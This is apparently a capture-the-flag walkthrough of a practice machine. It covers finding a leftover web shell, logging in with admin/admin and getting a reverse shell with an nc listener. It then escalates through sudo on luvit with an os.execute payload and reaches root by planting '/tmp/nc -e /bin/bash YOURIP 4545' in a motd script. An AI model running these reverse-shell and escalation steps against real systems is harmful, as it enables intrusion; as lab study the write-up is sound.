Edit: Because of new server the image files for this article are missing.
Initial Foothold:
As usual the first thing to do when starting on a new box is to run a scan and see what we have to work with.
As you can see from the image above we have two ports open. Port 22 and Port 80. Lets take a look what port 80 has to offer.
Looks like a webpage without any links. My next step was to check the source code of the page.
From this we can take away that there is a backdoor left open and that the hacker name is Xh4H. So google here I come. Google led me to a twitter post which led me to a GitHub repository with bunch of shells. When I was going through the repo I noticed the text in the README.md file. That’s exactly what the hacker left of the page as a text, so I started testing all of the shells until finally I got the right one. The link to the git repo can be found bellow.
https://github.com/TheBinitGhimire/Web-Shells
You will be prompted to login but our fellow hacker have used pretty easy credentials.
User: admin
Password: admin
After login we are presented with a web shell.
I personally don’t like web shells so I decided to get a reverse shell. There are several ways to achieve that. The first one is to the “Code Injection” tab or you can use the “Network” tab. I took the second option. On my Kali machine I started a listener nc -nlvp 4444 and then just put my VPN IP and choose perl then run it.
Next step was to check which user am I on the system with this reverse shell.
User:
OK so I am webadmin. My next step is to go to the home folder and then to the webadmin folder, because it makes sense that I would have access to that one. After checking the folder there is only one file inside called note.txt. Opening the file shows us a small note, which mentions something called Lua. I have never heard it so I googled it.
Usually it is good to run also “sudo -l” to see what I can run as webadmin.
The image above shows that I can run something called luvit. That prompted more googling and trying to understand whats going on. Here is a link if you are interested what Luvit is: https://luvit.io/
So now I needed to exploit that somehow. More Googling lead me to GTFObins. The shell command that they mention is:
lua -e 'os.execute("/bin/sh")'So a quick echo to a file of parts of the command:
echo 'os.execute("/bin/bash");' > let.luaAfter that lets run it:
sudo -u sysadmin /home/sysadmin/luvit let.lua
Now navigate to the sysadmin folder to get the flag. Done with user, so let go for root.
If you get stuck join our Discord. Even if you are not stuck join and chat with like minded people.
Root:
So for root… Run pspy64. Got to /etc/update-motd.d . So there are several files we can edit as sysadmin.
Add “/tmp/nc -e /bin/bash YOURIP 4545” to the 91-release-upgrade before the if statement. Start another listener on your machine on port 4545 and here you go.
